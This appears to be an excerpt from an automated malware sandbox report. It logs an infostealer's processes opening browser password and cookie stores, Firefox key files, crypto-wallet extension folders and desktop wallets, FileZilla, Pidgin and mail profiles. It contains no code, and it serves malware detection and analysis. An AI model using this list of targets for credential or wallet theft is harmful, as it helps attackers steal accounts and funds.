                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqliteJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqliteJump to behavior
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                Tries to harvest and steal ftp login credentials
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                                Tries to steal Crypto Currency Wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Tries to steal Instant Messenger accounts or passwords
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\pYYcSxIhBKAwfJeYUhxRdRWdJVtxceeCaTqdxlePlmkrwxyhCI\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\5454e6f062\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000008001\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\RageMP131\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000147001\.purple\accounts.xml
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
                                Tries to steal Mail credentials (via file / registry access)
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
